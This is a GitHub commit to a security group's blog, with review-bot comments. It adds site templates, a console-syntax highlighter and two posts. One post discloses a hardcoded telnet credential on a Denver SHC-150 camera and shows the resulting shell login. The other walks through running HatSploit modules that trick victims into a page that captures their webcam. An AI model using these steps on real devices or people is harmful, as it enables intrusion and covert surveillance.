Add files via upload
enty8080 authored Nov 20, 2024
1 parent d570fdd commit 01e539a
Showing 12 changed files with 821 additions and 2 deletions.
129 changes: 129 additions & 0 deletions _includes/head.html
@@ -0,0 +1,129 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
<meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta
name="viewport"
content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
>

{%- capture seo_tags -%}
{% seo title=false %}
{%- endcapture -%}

<!-- Setup Open Graph image -->

{% if page.image %}
{% assign src = page.image.path | default: page.image %}

{% unless src contains '://' %}
{%- capture img_url -%}
{% include media-url.html src=src subpath=page.media_subpath absolute=true %}
{%- endcapture -%}

{%- capture old_url -%}{{ src | absolute_url }}{%- endcapture -%}
{%- capture new_url -%}{{ img_url }}{%- endcapture -%}

{% assign seo_tags = seo_tags | replace: old_url, new_url %}
{% endunless %}

{% elsif site.social_preview_image %}
{%- capture img_url -%}
{% include media-url.html src=site.social_preview_image absolute=true %}
{%- endcapture -%}

{%- capture og_image -%}
<meta property="og:image" content="{{ img_url }}" />
{%- endcapture -%}

{%- capture twitter_image -%}
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="{{ img_url }}" />
{%- endcapture -%}

{% assign old_meta_clip = '<meta name="twitter:card" content="summary" />' %}
{% assign new_meta_clip = og_image | append: twitter_image %}
{% assign seo_tags = seo_tags | replace: old_meta_clip, new_meta_clip %}
{% endif %}

{{ seo_tags }}

<title>
{%- unless page.layout == 'home' -%}
{{ page.title | append: ' | ' }}
{%- endunless -%}
{{ site.title }}
</title>

{% include_cached favicons.html %}

<!-- Resource Hints -->
{% unless site.assets.self_host.enabled %}
{% for hint in site.data.origin.cors.resource_hints %}
{% for link in hint.links %}
<link rel="{{ link.rel }}" href="{{ hint.url }}" {{ link.opts | join: ' ' }}>
{% endfor %}
{% endfor %}
{% endunless %}

<!-- Bootstrap -->
{% unless jekyll.environment == 'production' %}
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
{% endunless %}

<!-- Theme style -->
<link rel="stylesheet" href="{{ '/assets/css/:THEME.css' | replace: ':THEME', site.theme | relative_url }}">

<!-- Web Font -->
<link rel="stylesheet" href="{{ site.data.origin[type].webfonts | relative_url }}">

<!-- Font Awesome Icons -->
<link rel="stylesheet" href="{{ site.data.origin[type].fontawesome.css | relative_url }}">

<!-- 3rd-party Dependencies -->

{% if site.toc and page.toc %}
<link rel="stylesheet" href="{{ site.data.origin[type].toc.css | relative_url }}">
{% endif %}

{% if page.layout == 'post' or page.layout == 'page' or page.layout == 'home' %}
<link rel="stylesheet" href="{{ site.data.origin[type]['lazy-polyfill'].css | relative_url }}">
{% endif %}

{% if page.layout == 'page' or page.layout == 'post' %}
<!-- Image Popup -->
<link rel="stylesheet" href="{{ site.data.origin[type].glightbox.css | relative_url }}">
{% endif %}

<!-- Scripts -->

{% unless site.theme_mode %}
<script src="{{ '/assets/js/dist/theme.min.js' | relative_url }}"></script>
{% endunless %}

{% include js-selector.html lang=lang %}

{% if jekyll.environment == 'production' %}
<!-- PWA -->
{% if site.pwa.enabled %}
<script
defer
src="{{ '/app.min.js' | relative_url }}?baseurl={{ site.baseurl | default: '' }}&register={{ site.pwa.cache.enabled }}"
></script>
{% endif %}

<!-- Web Analytics -->
{% for analytics in site.analytics %}
{% capture str %}{{ analytics }}{% endcapture %}
{% assign platform = str | split: '{' | first %}
{% if site.analytics[platform].id and site.analytics[platform].id != empty %}
{% include analytics/{{ platform }}.html %}
{% endif %}
{% endfor %}
{% endif %}

{% include metadata-hook.html %}
<link rel="stylesheet" href="{% link assets/main.css %}">
</head>
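Review bot: `type` is never assigned in this file, yet every `site.data.origin[type]` lookup (web font, Font Awesome, toc, lazy-polyfill, glightbox) depends on it, and `lang` in `{% include js-selector.html lang=lang %}` has the same problem. Unless the layout that includes head.html assigns both first, these lookups resolve to nil and the stylesheet links will not point at the intended files; assign them at the top of this include or document the dependency in a comment. Two smaller points: the viewport `content` is missing a comma between `user-scalable=no` and `initial-scale=1`, and the jsDelivr Bootstrap `<link>` carries no `integrity`/`crossorigin` attributes, so the CDN response is not pinned to a known hash.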
82 changes: 82 additions & 0 deletions _plugins/entysec.rb
@@ -0,0 +1,82 @@
require 'rouge'

module Rouge
module Tokens
def self.token(name, shortname, &b)
tok = Token.make_token(name, shortname, &b)
const_set(name, tok)
end

SHORTNAME = 'z'

token :EntySec, SHORTNAME do
token :Prompt, "#{SHORTNAME}p"
token :Error, "#{SHORTNAME}e"
token :Good, "#{SHORTNAME}g"
token :Status, "#{SHORTNAME}s"
token :Warning, "#{SHORTNAME}w"
token :Info, "#{SHORTNAME}i"
end
end

module Lexers
class EntySecConsoleLanguage < Rouge::RegexLexer
title 'entysec'
tag 'entysec'
desc 'EntySec Console Highlighter'
filenames []
mimetypes []

def self.keywords
@keywords ||= Set.new %w()
end

state :whitespace do
rule %r/\s+/, Text
end

state :root do
mixin :whitespace

rule %r{^(pwny:)}, Text, :pwny_prompt
rule %r{^\[-\]}, Tokens::EntySec::Error
rule %r{^\[\+\]}, Tokens::EntySec::Good
rule %r{^\[\*\]}, Tokens::EntySec::Status
rule %r{^\[\!\]}, Tokens::EntySec::Warning
rule %r{^(\[i\]|\[\?\]|\[>\])}, Tokens::EntySec::Info
rule %r{^(\[)}, Text, :hsf_prompt
rule %r{^(\()}, Text, :regular_prompt
rule %r{.+}, Text
end

state :regular_prompt do
mixin :whitespace

rule %r{ghost|seashell}, Tokens::EntySec::Prompt
rule %r{:}, Punctuation
rule %r{[.\w/-]+}, Tokens::EntySec::Error
rule %r{\)}, Punctuation
rule %r{>}, Punctuation, :pop!
end

state :hsf_prompt do
mixin :whitespace

rule %r{hsf\d?}, Tokens::EntySec::Warning
rule %r{exploit|auxiliary|post}, Text
rule %r{:}, Punctuation
rule %r{\]}, Punctuation
rule %r{[.\w/-]+}, Tokens::EntySec::Error
rule %r{>}, Punctuation, :pop!
end

state :pwny_prompt do
mixin :whitespace

rule %r{(/[\w/]*)(?=\s)}, Tokens::EntySec::Prompt
rule %r{(\w+)}, Tokens::EntySec::Status
rule %r{\$|\#}, Punctuation, :pop!
end
end
end
end
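Review bot: the `:hsf_prompt` and `:regular_prompt` states pop only on `>`, and `:pwny_prompt` only on `$` or `#`, so a line that starts with `[`, `(` or `pwny:` but never reaches that character leaves the lexer in the prompt state for the lines that follow, because `mixin :whitespace` consumes the newline with `\s+`. Add a rule ahead of the mixin that pops on `\n`, or have the root rules enter the state only when the closing character is on the same line. In `:hsf_prompt`, `%r{exploit|auxiliary|post}` is unanchored and will split a longer word that merely begins with `post`; add `\b` on both sides. `self.keywords` is never used and calls `Set` without a `require 'set'`; drop it or add the require.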
48 changes: 48 additions & 0 deletions _posts/2021-07-28-denver-backdoors.md
@@ -0,0 +1,48 @@
---
title: Denver SHC-150 Camera Backdoor
categories: [Exploitation]
tags: [research, backdoor, iot]
---

<p align="center">
<img width="100%" src="/assets/img/shc-150-specs.png">
</p>

Backdoor was found in a Denver SHC-150 Smart Wifi Camera by Ivan Nikolsky, security researcher from EntySec.

> I bought this model of wifi camera in the shop and before setting it up, checked it for vulnerabilities and backdoors.
> I scanned this camera for open ports and noticed that telnet service is running on port 23. I brute-forced credentials and logged right to the shell.
> There is no way to close this port or change credentials - they are hardcoded. Maybe other models also have this backdoor too, I am not sure.
>
> -- <cite>Ivan Nikolskiy</cite>
So, the telnet service, as Ivan noticed, has hardcoded credentials and after brute-forcing them he found out that the only thing which is needed to login is username - `default`.

```shell
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.

goke login: default
$ ls /
bin home linuxrc opt run tmp
dev init media proc sbin usr
etc lib mnt root sys var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```

As you can see, successfull login leads to the shell of the camera. Also he found out that Denver SHC-150 Smart Wifi Camera runs on `armle` CPU and has `r/w` filesystem.

> So, backdoor is a factory telnet credential - `default`.
> Just open the telnet connection with the camera on port 23 and enter `default`.
> After this, you'll get a Linux shell.
> Backdoor allows an attacker to execute commands on OS lever through telnet.
>
> -- <cite>Ivan Nikolskiy</cite>
Ivan has already posted this research [here](https://www.exploit-db.com/exploits/50160).
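Review bot: both `-- <cite>Ivan Nikolskiy</cite>` lines are followed directly by a paragraph (`So, the telnet service…` and `Ivan has already posted…`) with no blank line, so Markdown treats that text as a lazy continuation of the blockquote and renders it as part of the quote; insert a blank line after each cite. The researcher's name is spelled `Nikolsky` in the opening sentence and `Nikolskiy` in the cites, and the body has `successfull` and `OS lever`. The `<img>` has no `alt` text. Since the quote says the port cannot be closed and the credential cannot be changed, a short closing paragraph on what owners can do (for example keeping the camera on an isolated network segment) would round the post out.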
97 changes: 97 additions & 0 deletions _posts/2022-03-13-webcam-photo-phishing.md
@@ -0,0 +1,97 @@
---
title: Webcam Photo Phishing
categories: [Exploitation]
tags: [hatsploit, phishing]
---

Phishing is a common technique used by attackers to gain access to sensitive information through methods like social engineering. Attackers often attempt to obtain credentials, password hashes, location data, and other critical information by tricking users into revealing this data.

In the HatSploit Framework, EntySec has implemented several modules specifically designed to target a victim’s webcam. These modules allow attackers to take a photo using the target's webcam through a browser and save the captured image as loot on the attacker's machine. Additionally, attackers can stream the webcam footage in real-time. These modules are named `exploit/generic/gather/browser_webcam_photo` and `exploit/generic/gather/browser_webcam_stream`.

Here’s how you can access and use these modules:

```entysec
[hsf3]> search webcam
Modules:
Number Category Module Rank Name
0 exploit exploit/generic/gather/browser_webcam_photo low Gather Browser Webcam Photo
1 exploit exploit/generic/gather/browser_webcam_stream low Gather Browser Webcam Stream
```

## Using the module

Once you have identified the desired module, you can use it within the HatSploit Framework and set the appropriate options.

For example, to use the `Gather Browser Webcam Photo` module:

```entysec
[hsf]> use 0
[hsf3: Gather Browser Webcam Photo]> info
Name: Gather Browser Webcam Photo
Module: exploit/generic/gather/browser_webcam_photo
Platform: generic
Rank: low
Authors:
Ivan Nikolskiy (enty8080) - module developer
Description:
This module generates a webpage that, when accessed by a victim, attempts to capture an image using the built-in webcam and send it to the attacker.
References:
URL: https://blog.entysec.com/2022-03-13-webcam-photo-phishing/
Stability:
This module is stable and does not crash the target.
```

## Configuring the module

You will need to configure several options before running the module:

```entysec
[hsf3: Gather Browser Webcam Photo]> options
Module Options (exploit/generic/gather/browser_webcam_photo):
Option Value Required Description
HOST yes HTTP host.
MESSAGE Grant Access yes Message to display.
PATH /Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png yes Path to save file.
PORT 80 yes HTTP port.
SSL no no Use SSL.
TIMEOUT 10 no Connection timeout.
URLPATH / yes File path on server.
```

## Running the module

After configuring the options, you can start the web server and wait for the victim to access the malicious webpage. The module will continue to capture images from the victim’s webcam until it is manually interrupted.

Here’s an example:

```entysec
[hsf3: Gather Browser Webcam Photo]> set host localhost
[i] host => localhost
[hsf3: Gather Browser Webcam Photo]> set port 8080
[i] port => 8080
[hsf3: Gather Browser Webcam Photo]> run
[*] Starting HTTP listener on port 8080...
[*] Delivering payload...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[!] Exploit module interrupted.
```

This module will continue to capture and update the photo file saved in the loot directory until you stop it manually with keyboard interrupt (Ctrl-C).

By utilizing this module, attackers can gain access to sensitive webcam data through the use of phishing techniques, making it an essential tool in the HatSploit Framework.
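Review bot: the `options` listing publishes a local filesystem path, `/Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png`, which exposes a local account name; replace it with a placeholder path before publishing. The prompt changes from `[hsf3]>` in the search block to `[hsf]>` at `use 0` and back to `[hsf3: …]>` on the next line, so pick one form. The closing sentence reads as promotion; a line on how users can see and revoke a site's camera permission in the browser would serve readers better.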